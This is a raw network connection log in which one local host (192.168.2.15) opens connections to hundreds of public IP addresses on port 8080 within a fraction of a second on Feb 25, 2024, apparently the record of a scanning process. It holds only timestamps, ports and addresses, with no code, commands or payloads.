Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	31.15.194.169
Feb 25, 2024 19:02:18.567239046 CET	6758	8080	192.168.2.15	62.115.7.67
Feb 25, 2024 19:02:18.567240000 CET	6758	8080	192.168.2.15	95.63.21.37
Feb 25, 2024 19:02:18.567275047 CET	6758	8080	192.168.2.15	95.204.160.86
Feb 25, 2024 19:02:18.567275047 CET	6758	8080	192.168.2.15	85.38.148.255
Feb 25, 2024 19:02:18.567275047 CET	6758	8080	192.168.2.15	94.205.67.81
Feb 25, 2024 19:02:18.567275047 CET	6758	8080	192.168.2.15	95.65.239.252
Feb 25, 2024 19:02:18.567275047 CET	6758	8080	192.168.2.15	85.50.29.81
Feb 25, 2024 19:02:18.567275047 CET	6758	8080	192.168.2.15	62.147.108.119
Feb 25, 2024 19:02:18.567284107 CET	6758	8080	192.168.2.15	31.77.72.129
Feb 25, 2024 19:02:18.567284107 CET	6758	8080	192.168.2.15	31.80.91.221
Feb 25, 2024 19:02:18.567284107 CET	6758	8080	192.168.2.15	31.207.6.58
Feb 25, 2024 19:02:18.567284107 CET	6758	8080	192.168.2.15	85.72.147.24
Feb 25, 2024 19:02:18.567284107 CET	6758	8080	192.168.2.15	31.119.104.107
Feb 25, 2024 19:02:18.567284107 CET	6758	8080	192.168.2.15	31.156.121.112
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	62.210.217.163
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	85.190.201.188
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	95.250.217.116
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	62.15.86.43
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	62.165.211.204
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	85.147.52.43
Feb 25, 2024 19:02:18.567303896 CET	6758	8080	192.168.2.15	95.37.95.143
Feb 25, 2024 19:02:18.567312002 CET	6758	8080	192.168.2.15	95.35.96.233
Feb 25, 2024 19:02:18.567312002 CET	6758	8080	192.168.2.15	95.249.227.38
Feb 25, 2024 19:02:18.567312002 CET	6758	8080	192.168.2.15	95.229.255.120
Feb 25, 2024 19:02:18.567312002 CET	6758	8080	192.168.2.15	94.243.163.220
Feb 25, 2024 19:02:18.567312002 CET	6758	8080	192.168.2.15	94.237.84.1
Feb 25, 2024 19:02:18.567312956 CET	6758	8080	192.168.2.15	94.37.15.151
Feb 25, 2024 19:02:18.567312956 CET	6758	8080	192.168.2.15	85.240.128.195
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	62.109.54.143
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	31.179.171.110
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	85.18.102.28
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	62.253.111.192
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	95.132.11.183
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	94.196.241.90
Feb 25, 2024 19:02:18.567322016 CET	6758	8080	192.168.2.15	85.136.229.174
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	94.20.41.157
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	94.89.146.178
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	85.158.135.123
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	94.93.175.79
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	62.43.227.97
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	62.149.10.233
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	85.182.135.48
Feb 25, 2024 19:02:18.567363977 CET	6758	8080	192.168.2.15	62.2.37.216
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	94.253.174.86
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	95.233.249.200
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	31.67.132.216
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	85.33.46.240
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	85.41.239.215
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	62.212.116.31
Feb 25, 2024 19:02:18.567379951 CET	6758	8080	192.168.2.15	31.194.184.62
Feb 25, 2024 19:02:18.567384958 CET	6758	8080	192.168.2.15	94.162.3.11
Feb 25, 2024 19:02:18.567384958 CET	6758	8080	192.168.2.15	94.57.92.28
Feb 25, 2024 19:02:18.567384958 CET	6758	8080	192.168.2.15	95.146.160.100
Feb 25, 2024 19:02:18.567384958 CET	6758	8080	192.168.2.15	95.119.17.50
Feb 25, 2024 19:02:18.567384958 CET	6758	8080	192.168.2.15	85.203.188.223
Feb 25, 2024 19:02:18.567384958 CET	6758	8080	192.168.2.15	94.176.236.47
Feb 25, 2024 19:02:18.567389965 CET	6758	8080	192.168.2.15	85.178.78.75
Feb 25, 2024 19:02:18.567389965 CET	6758	8080	192.168.2.15	31.153.254.116
Feb 25, 2024 19:02:18.567389965 CET	6758	8080	192.168.2.15	94.204.28.134
Feb 25, 2024 19:02:18.567389965 CET	6758	8080	192.168.2.15	62.38.39.246
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	94.44.128.206
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	85.77.176.133
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	95.157.42.20
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	31.181.183.166
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	62.176.50.47
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	95.75.61.15
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	31.114.36.249
Feb 25, 2024 19:02:18.567399025 CET	6758	8080	192.168.2.15	94.201.206.247
Feb 25, 2024 19:02:18.567414999 CET	6758	8080	192.168.2.15	85.71.95.169
Feb 25, 2024 19:02:18.567434072 CET	6758	8080	192.168.2.15	31.77.222.69
Feb 25, 2024 19:02:18.567434072 CET	6758	8080	192.168.2.15	95.252.131.174
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	31.183.163.181
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	62.135.36.9
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	62.28.85.200
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	62.157.94.115
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	31.240.37.54
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	85.237.93.75
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	94.101.218.45
Feb 25, 2024 19:02:18.567450047 CET	6758	8080	192.168.2.15	95.163.29.105
Feb 25, 2024 19:02:18.567462921 CET	6758	8080	192.168.2.15	62.76.245.7
Feb 25, 2024 19:02:18.567462921 CET	6758	8080	192.168.2.15	95.174.25.114
Feb 25, 2024 19:02:18.567464113 CET	6758	8080	192.168.2.15	62.151.168.99
Feb 25, 2024 19:02:18.567464113 CET	6758	8080	192.168.2.15	85.152.52.196
Feb 25, 2024 19:02:18.567466021 CET	6758	8080	192.168.2.15	31.204.117.87
Feb 25, 2024 19:02:18.567464113 CET	6758	8080	192.168.2.15	95.164.249.202
Feb 25, 2024 19:02:18.567464113 CET	6758	8080	192.168.2.15	62.78.83.183
Feb 25, 2024 19:02:18.567464113 CET	6758	8080	192.168.2.15	95.190.42.46
Feb 25, 2024 19:02:18.567464113 CET	6758	8080	192.168.2.15	62.230.69.45
Feb 25, 2024 19:02:18.567468882 CET	6758	8080	192.168.2.15	94.181.123.163
Feb 25, 2024 19:02:18.567468882 CET	6758	8080	192.168.2.15	62.29.86.189
Feb 25, 2024 19:02:18.567470074 CET	6758	8080	192.168.2.15	95.38.155.9
Feb 25, 2024 19:02:18.567470074 CET	6758	8080	192.168.2.15	62.9.44.0
Feb 25, 2024 19:02:18.567470074 CET	6758	8080	192.168.2.15	31.0.246.29
Feb 25, 2024 19:02:18.567470074 CET	6758	8080	192.168.2.15	31.52.231.16
Feb 25, 2024 19:02:18.567470074 CET	6758	8080	192.168.2.15	95.68.206.76
Feb 25, 2024 19:02:18.567470074 CET	6758	8080	192.168.2.15	62.240.154.226
Feb 25, 2024 19:02:18.567475080 CET	6758	8080	192.168.2.15	85.140.7.147
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	85.150.139.130
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	85.232.177.230
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	85.193.18.119
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	62.67.210.112
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	62.116.8.177
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	94.166.133.201
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	62.170.90.64
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	94.108.188.112
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	62.73.82.119
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	95.4.78.217
Feb 25, 2024 19:02:18.567487955 CET	6758	8080	192.168.2.15	85.34.159.127
Feb 25, 2024 19:02:18.567500114 CET	6758	8080	192.168.2.15	62.72.166.45
Feb 25, 2024 19:02:18.567500114 CET	6758	8080	192.168.2.15	31.158.136.36
Feb 25, 2024 19:02:18.567500114 CET	6758	8080	192.168.2.15	62.242.211.32
Feb 25, 2024 19:02:18.567500114 CET	6758	8080	192.168.2.15	62.89.11.209
Feb 25, 2024 19:02:18.567500114 CET	6758	8080	192.168.2.15	94.43.52.245
Feb 25, 2024 19:02:18.567533016 CET	6758	8080	192.168.2.15	94.214.23.74
Feb 25, 2024 19:02:18.567542076 CET	6758	8080	192.168.2.15	85.199.222.108
Feb 25, 2024 19:02:18.567542076 CET	6758	8080	192.168.2.15	94.253.165.229
Feb 25, 2024 19:02:18.567542076 CET	6758	8080	192.168.2.15	94.161.194.204
Feb 25, 2024 19:02:18.567542076 CET	6758	8080	192.168.2.15	95.210.173.187
Feb 25, 2024 19:02:18.567542076 CET	6758	8080	192.168.2.15	95.50.137.145
Feb 25, 2024 19:02:18.567542076 CET	6758	8080	192.168.2.15	95.246.90.0
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	31.178.39.68
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	94.162.19.114
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	62.226.188.83
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	95.57.10.26
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	62.156.223.178
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	95.105.39.169
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	95.13.30.201
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	85.232.221.203
Feb 25, 2024 19:02:18.567558050 CET	6758	8080	192.168.2.15	94.250.37.109
Feb 25, 2024 19:02:18.567563057 CET	6758	8080	192.168.2.15	95.65.158.3
Feb 25, 2024 19:02:18.567564011 CET	6758	8080	192.168.2.15	62.127.186.30
Feb 25, 2024 19:02:18.567564011 CET	6758	8080	192.168.2.15	94.107.95.145
Feb 25, 2024 19:02:18.567564011 CET	6758	8080	192.168.2.15	31.165.99.184
Feb 25, 2024 19:02:18.567563057 CET	6758	8080	192.168.2.15	62.50.188.92
Feb 25, 2024 19:02:18.567564011 CET	6758	8080	192.168.2.15	95.251.82.233
Feb 25, 2024 19:02:18.567563057 CET	6758	8080	192.168.2.15	31.73.165.146
Feb 25, 2024 19:02:18.567564011 CET	6758	8080	192.168.2.15	31.68.210.0
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	85.19.205.58
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	85.207.65.66
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	95.126.36.192
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	94.136.26.0
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	85.173.255.251
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	94.106.164.221
Feb 25, 2024 19:02:18.567570925 CET	6758	8080	192.168.2.15	31.165.74.157
Feb 25, 2024 19:02:18.567598104 CET	6758	8080	192.168.2.15	94.73.100.7
Feb 25, 2024 19:02:18.567598104 CET	6758	8080	192.168.2.15	31.68.101.249
Feb 25, 2024 19:02:18.567598104 CET	6758	8080	192.168.2.15	62.16.111.83
Feb 25, 2024 19:02:18.567598104 CET	6758	8080	192.168.2.15	31.209.199.64
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	31.25.180.75
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	62.51.154.219
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	85.68.214.36
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	94.90.152.53
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	94.18.55.237
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	31.0.185.123
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	62.39.222.137
Feb 25, 2024 19:02:18.567600965 CET	6758	8080	192.168.2.15	85.207.219.18
Feb 25, 2024 19:02:18.567655087 CET	6758	8080	192.168.2.15	94.104.120.168
Feb 25, 2024 19:02:18.567655087 CET	6758	8080	192.168.2.15	95.129.21.96
Feb 25, 2024 19:02:18.567655087 CET	6758	8080	192.168.2.15	31.165.84.203
Feb 25, 2024 19:02:18.567655087 CET	6758	8080	192.168.2.15	31.235.153.124
Feb 25, 2024 19:02:18.567655087 CET	6758	8080	192.168.2.15	31.24.106.204
Feb 25, 2024 19:02:18.567655087 CET	6758	8080	192.168.2.15	85.123.41.235
Feb 25, 2024 19:02:18.567662001 CET	6758	8080	192.168.2.15	94.219.36.86
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	62.161.249.10
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	62.194.248.104
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	95.237.57.33
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	31.111.214.9
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	62.174.175.8
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	62.213.172.206
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	95.102.228.141
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	62.55.8.128
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	62.101.109.219
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	85.55.141.8
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	31.102.108.142
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	62.109.166.240
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	62.69.65.105
Feb 25, 2024 19:02:18.567662954 CET	6758	8080	192.168.2.15	95.113.178.90
Feb 25, 2024 19:02:18.567663908 CET	6758	8080	192.168.2.15	62.23.216.34
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	62.9.152.146
Feb 25, 2024 19:02:18.567667961 CET	6758	8080	192.168.2.15	31.175.242.7
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	62.194.54.110
Feb 25, 2024 19:02:18.567667961 CET	6758	8080	192.168.2.15	62.107.100.41
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	85.23.77.108
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	85.30.56.167
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	31.143.193.133
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	94.87.174.64
Feb 25, 2024 19:02:18.567668915 CET	6758	8080	192.168.2.15	85.231.60.102
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	94.219.171.222
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	31.244.117.238
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	62.8.200.113
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	31.110.177.216
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	62.59.214.103
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	94.50.197.85
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	94.83.61.71
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	31.206.155.213
Feb 25, 2024 19:02:18.567678928 CET	6758	8080	192.168.2.15	85.98.45.159
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	31.246.16.227
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	31.246.61.193
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	94.51.151.232
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	62.33.247.105
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	62.155.42.201
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	95.222.163.102
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	94.205.51.199
Feb 25, 2024 19:02:18.567693949 CET	6758	8080	192.168.2.15	31.25.55.39
Feb 25, 2024 19:02:18.567701101 CET	6758	8080	192.168.2.15	85.86.75.11
Feb 25, 2024 19:02:18.567701101 CET	6758	8080	192.168.2.15	94.81.163.83
Feb 25, 2024 19:02:18.567720890 CET	6758	8080	192.168.2.15	85.10.78.199
Feb 25, 2024 19:02:18.567735910 CET	6758	8080	192.168.2.15	94.0.193.197
Feb 25, 2024 19:02:18.567735910 CET	6758	8080	192.168.2.15	62.183.135.144
Feb 25, 2024 19:02:18.567735910 CET	6758	8080	192.168.2.15	94.70.35.233
Feb 25, 2024 19:02:18.567735910 CET	6758	8080	192.168.2.15	31.169.145.173
Feb 25, 2024 19:02:18.567768097 CET	6758	8080	192.168.2.15	94.99.220.125
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	31.148.21.89
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	31.2.238.189
Feb 25, 2024 19:02:18.567779064 CET	6758	8080	192.168.2.15	85.97.14.113
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	95.44.228.128
Feb 25, 2024 19:02:18.567779064 CET	6758	8080	192.168.2.15	62.222.213.30
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	85.9.172.94
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	62.151.176.205
Feb 25, 2024 19:02:18.567779064 CET	6758	8080	192.168.2.15	94.77.60.186
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	62.17.218.174
Feb 25, 2024 19:02:18.567779064 CET	6758	8080	192.168.2.15	31.43.35.252
Feb 25, 2024 19:02:18.567778111 CET	6758	8080	192.168.2.15	62.0.126.143
Feb 25, 2024 19:02:18.567779064 CET	6758	8080	192.168.2.15	94.156.161.116
Feb 25, 2024 19:02:18.567785978 CET	6758	8080	192.168.2.15	85.5.207.251
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	85.190.52.153
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	31.156.82.124
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	31.144.188.80
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	95.71.19.163
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	94.251.90.136
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	94.236.115.160
Feb 25, 2024 19:02:18.567807913 CET	6758	8080	192.168.2.15	85.0.191.231
Feb 25, 2024 19:02:18.567811966 CET	6758	8080	192.168.2.15	62.172.222.70
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	62.20.131.87
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	31.104.67.215
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	31.170.91.67
Feb 25, 2024 19:02:18.567816019 CET	6758	8080	192.168.2.15	31.21.111.216
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	85.238.78.11
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	62.218.188.85
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	95.220.116.107
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	62.81.147.10
Feb 25, 2024 19:02:18.567816019 CET	6758	8080	192.168.2.15	62.140.98.7
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	62.118.188.116
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	31.91.92.182
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	85.172.30.8
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	94.151.113.115
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	62.84.184.235
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	95.84.217.248
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	31.248.29.162
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	31.178.6.39
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	85.90.242.254
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	95.82.217.73
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	62.75.166.192
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	94.213.2.213
Feb 25, 2024 19:02:18.567812920 CET	6758	8080	192.168.2.15	31.88.38.40
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	31.67.62.100
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	85.86.32.116
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	85.180.68.85
Feb 25, 2024 19:02:18.567814112 CET	6758	8080	192.168.2.15	94.166.18.3
Feb 25, 2024 19:02:18.567862034 CET	6758	8080	192.168.2.15	85.26.191.96
Feb 25, 2024 19:02:18.567862034 CET	6758	8080	192.168.2.15	31.185.235.86
Feb 25, 2024 19:02:18.567862034 CET	6758	8080	192.168.2.15	94.178.7.22
Feb 25, 2024 19:02:18.567862034 CET	6758	8080	192.168.2.15	94.236.208.42
Feb 25, 2024 19:02:18.567866087 CET	6758	8080	192.168.2.15	31.20.25.145
Feb 25, 2024 19:02:18.567862034 CET	6758	8080	192.168.2.15	31.162.185.171
Feb 25, 2024 19:02:18.567873001 CET	6758	8080	192.168.2.15	62.53.245.51
Feb 25, 2024 19:02:18.567873001 CET	6758	8080	192.168.2.15	62.208.241.119
Feb 25, 2024 19:02:18.567887068 CET	6758	8080	192.168.2.15	62.135.3.241
Feb 25, 2024 19:02:18.567898035 CET	6758	8080	192.168.2.15	95.131.232.31
Feb 25, 2024 19:02:18.567898035 CET	6758	8080	192.168.2.15	31.101.229.202
Feb 25, 2024 19:02:18.567898035 CET	6758	8080	192.168.2.15	94.147.149.51
Feb 25, 2024 19:02:18.567898035 CET	6758	8080	192.168.2.15	85.16.108.188
Feb 25, 2024 19:02:18.567898035 CET	6758	8080	192.168.2.15	31.243.88.177
Feb 25, 2024 19:02:18.567922115 CET	6758	8080	192.168.2.15	95.204.148.79
Feb 25, 2024 19:02:18.567922115 CET	6758	8080	192.168.2.15	31.128.232.103
Feb 25, 2024 19:02:18.567922115 CET	6758	8080	192.168.2.15	95.100.111.218
Feb 25, 2024 19:02:18.567922115 CET	6758	8080	192.168.2.15	95.139.33.51
Feb 25, 2024 19:02:18.567922115 CET	6758	8080	192.168.2.15	62.52.151.112
Feb 25, 2024 19:02:18.567922115 CET	6758	8080	192.168.2.15	94.31.98.90
Feb 25, 2024 19:02:18.567924023 CET	6758	8080	192.168.2.15	94.222.161.165
Feb 25, 2024 19:02:18.567934036 CET	6758	8080	192.168.2.15	31.179.113.193
Feb 25, 2024 19:02:18.567934036 CET	6758	8080	192.168.2.15	94.17.112.19
Feb 25, 2024 19:02:18.567934036 CET	6758	8080	192.168.2.15	62.217.120.7
Feb 25, 2024 19:02:18.567944050 CET	6758	8080	192.168.2.15	31.246.38.234
Feb 25, 2024 19:02:18.567945004 CET	6758	8080	192.168.2.15	31.178.228.158
Feb 25, 2024 19:02:18.567944050 CET	6758	8080	192.168.2.15	95.40.95.18
Feb 25, 2024 19:02:18.567944050 CET	6758	8080	192.168.2.15	85.47.222.183
Feb 25, 2024 19:02:18.567944050 CET	6758	8080	192.168.2.15	95.79.65.243
Feb 25, 2024 19:02:18.567944050 CET	6758	8080	192.168.2.15	62.195.75.138
Feb 25, 2024 19:02:18.567944050 CET	6758	8080	192.168.2.15	31.229.175.193
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	62.35.50.39
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	95.102.136.134
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	85.137.178.192
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	85.203.1.165
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	94.130.94.52
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	85.223.218.55
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	62.70.34.109
Feb 25, 2024 19:02:18.567950010 CET	6758	8080	192.168.2.15	85.168.48.0
Feb 25, 2024 19:02:18.567965984 CET	6758	8080	192.168.2.15	95.119.178.66
Feb 25, 2024 19:02:18.567977905 CET	6758	8080	192.168.2.15	95.154.227.192
Feb 25, 2024 19:02:18.567977905 CET	6758	8080	192.168.2.15	85.97.240.178
Feb 25, 2024 19:02:18.567982912 CET	6758	8080	192.168.2.15	85.34.172.175
Feb 25, 2024 19:02:18.567982912 CET	6758	8080	192.168.2.15	94.180.209.213
Feb 25, 2024 19:02:18.567982912 CET	6758	8080	192.168.2.15	94.164.163.222
Feb 25, 2024 19:02:18.567982912 CET	6758	8080	192.168.2.15	85.52.46.250
Feb 25, 2024 19:02:18.567982912 CET	6758	8080	192.168.2.15	94.186.192.134
Feb 25, 2024 19:02:18.567984104 CET	6758	8080	192.168.2.15	94.118.180.189
Feb 25, 2024 19:02:18.567984104 CET	6758	8080	192.168.2.15	85.76.231.167
Feb 25, 2024 19:02:18.567984104 CET	6758	8080	192.168.2.15	85.90.12.46
Feb 25, 2024 19:02:18.567991972 CET	6758	8080	192.168.2.15	85.17.224.11
Feb 25, 2024 19:02:18.567991972 CET	6758	8080	192.168.2.15	31.230.198.43
Feb 25, 2024 19:02:18.567991972 CET	6758	8080	192.168.2.15	31.223.231.161
Feb 25, 2024 19:02:18.567992926 CET	6758	8080	192.168.2.15	31.167.142.191
Feb 25, 2024 19:02:18.567992926 CET	6758	8080	192.168.2.15	31.46.43.138
Feb 25, 2024 19:02:18.567992926 CET	6758	8080	192.168.2.15	95.224.137.22
Feb 25, 2024 19:02:18.567992926 CET	6758	8080	192.168.2.15	31.2.251.218
Feb 25, 2024 19:02:18.567997932 CET	6758	8080	192.168.2.15	95.79.150.134
Feb 25, 2024 19:02:18.567997932 CET	6758	8080	192.168.2.15	94.46.237.241
Feb 25, 2024 19:02:18.567997932 CET	6758	8080	192.168.2.15	62.117.29.169
Feb 25, 2024 19:02:18.567997932 CET	6758	8080	192.168.2.15	31.78.184.28
Feb 25, 2024 19:02:18.567997932 CET	6758	8080	192.168.2.15	31.119.132.192
Feb 25, 2024 19:02:18.567997932 CET	6758	8080	192.168.2.15	95.81.13.121
Feb 25, 2024 19:02:18.568003893 CET	6758	8080	192.168.2.15	94.119.33.152
Feb 25, 2024 19:02:18.568025112 CET	6758	8080	192.168.2.15	94.38.31.201
Feb 25, 2024 19:02:18.568032026 CET	6758	8080	192.168.2.15	95.250.46.237
Feb 25, 2024 19:02:18.568032026 CET	6758	8080	192.168.2.15	31.49.14.147
Feb 25, 2024 19:02:18.568032026 CET	6758	8080	192.168.2.15	31.223.142.79
Feb 25, 2024 19:02:18.568032026 CET	6758	8080	192.168.2.15	31.153.40.43
Feb 25, 2024 19:02:18.568032026 CET	6758	8080	192.168.2.15	31.191.81.252
Feb 25, 2024 19:02:18.568032026 CET	6758	8080	192.168.2.15	31.205.211.15
Feb 25, 2024 19:02:18.568058968 CET	6758	8080	192.168.2.15	62.236.18.1
Feb 25, 2024 19:02:18.568058968 CET	6758	8080	192.168.2.15	95.52.81.166
